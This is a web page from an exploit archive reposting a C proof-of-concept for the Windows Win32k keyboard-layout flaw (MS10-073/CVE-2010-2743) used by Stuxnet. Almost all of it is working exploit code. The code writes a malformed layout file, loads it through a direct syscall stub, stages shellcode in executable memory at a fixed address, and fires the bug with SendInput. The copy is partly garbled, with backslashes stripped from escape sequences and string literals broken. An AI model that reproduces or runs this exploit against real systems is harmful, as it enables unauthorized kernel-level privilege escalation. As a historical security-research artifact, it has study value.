Home / os / win7

Win32k Keyboard Layout Vulnerability

Posted on 14 January 2011

// My koala is staring at you  CºgºD
// Source: http://reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1


#include <windows.h>
#include <stdio.h>
#include <ntsecapi.h>


#define MAGIC_OFFSET 0x6261

#define InitializeUnicodeStr(p,s) {     \n(p)->Length= wcslen(s)*2;           \n(p)->MaximumLength = wcslen(s)*2+2; \n(p)->Buffer = s;                \n}


_declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx
(
IN HANDLE Handle,
IN DWORD offTable,
IN PUNICODE_STRING puszKeyboardName,
IN HKL hKL,
IN PUNICODE_STRING puszKLID,
IN DWORD dwKLID,
IN UINT Flags
)
{
__asm
{
mov eax, 000011c6h
mov edx, 7ffe0300h
call dword ptr [edx]
retn 1Ch
}
}


unsigned char shellcode[]="x90x90x90x90xC2x0Cx00x90x90";

unsigned char fakeDll[]="x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x40x00x00x00"
"x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00"
"x00x00x00x00xE0x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x2Ex64x61x74x61x00x00x00"
"xE6x00x00x00x60x01x00x00xE6x00x00x00x60x01x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x94x01x00x00x9Ex01x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xA6x01x00x00xAAx01x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x9Cx01x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x01x00x00x00xC2x01x00x00x00x00x00x00x00x00"
"x00x00x00x05x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00";

int main(int argc, CHAR* argv[])
{

UNICODE_STRING  uStr;

KEYBDINPUT      kb={0};
INPUT           vInput={0};

HANDLE          hFile;
DWORD           dwFuckS0ny;

HKL             hKbd;

WCHAR           lpPath[MAX_PATH]={0};
WCHAR           lpLayoutFile[MAX_PATH]={0};

LPVOID          lpShellPtr;



printf("

Stuxnet MS10-073/CVE-2010-2743 Exploit
");
printf("Ruben Santamarta - www.reversemode.com

");



LoadLibraryA("user32.dll");

InitializeUnicodeStr(&uStr,L"pwn3d.dll");

GetTempPathW( MAX_PATH, lpPath );

wsprintf( lpLayoutFile, L"%lSp0wns.boom", lpPath);


hFile = CreateFileW(lpLayoutFile,
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
0,
CREATE_ALWAYS,
0,0);

if( hFile == INVALID_HANDLE_VALUE )
{
printf(" 
[!!] Error
");
exit(0);
}

WriteFile(  hFile,
fakeDll,
sizeof(fakeDll)-1,
&dwFuckS0ny,
NULL);

printf("
[+] Writing malformed kbd layout file 
	"%S"
	[ %d ] bytes written
",lpLayoutFile,dwFuckS0ny);
CloseHandle(hFile);

hFile = CreateFileW (lpLayoutFile,
GENERIC_READ,
FILE_SHARE_READ,
0,
OPEN_EXISTING,
0,0);

if( hFile == INVALID_HANDLE_VALUE )
{
printf(" 
[!!] Error
");
exit(0);
}

hKbd = GetKeyboardLayout( GetWindowThreadProcessId( GetForegroundWindow(), &dwFuckS0ny ) );


printf("
[+] Loading it...[ 0x%x ]
", NtUserLoadKeyboardLayoutEx( hFile, 0x01AE0160, NULL, hKbd, &uStr, 0x666, 0x101 ) );

lpShellPtr = VirtualAlloc( (LPVOID)0x60630000,
0xF000,
MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE);

printf("
[+] Allocating memory...");

if( !lpShellPtr )
{

printf("[!!] Error %x
",GetLastError());
exit(0);

}else{

printf("[ OK ]
");

}

memset( lpShellPtr, 0x90, 0xF000);

memcpy( ( void* )( ( ULONG_PTR ) lpShellPtr + MAGIC_OFFSET ),
( const void* )shellcode,
sizeof( shellcode ) - 1 );

kb.wVk = 0x0;
vInput.type  = INPUT_KEYBOARD;
vInput.ki  = kb;

printf("
[+] Triggering shellcode...");
SendInput( 1, ( LPINPUT ) &vInput, sizeof( INPUT ) );

printf("
[+] Done
");

return 0;
}

 

TOP

Malware :

Exploits :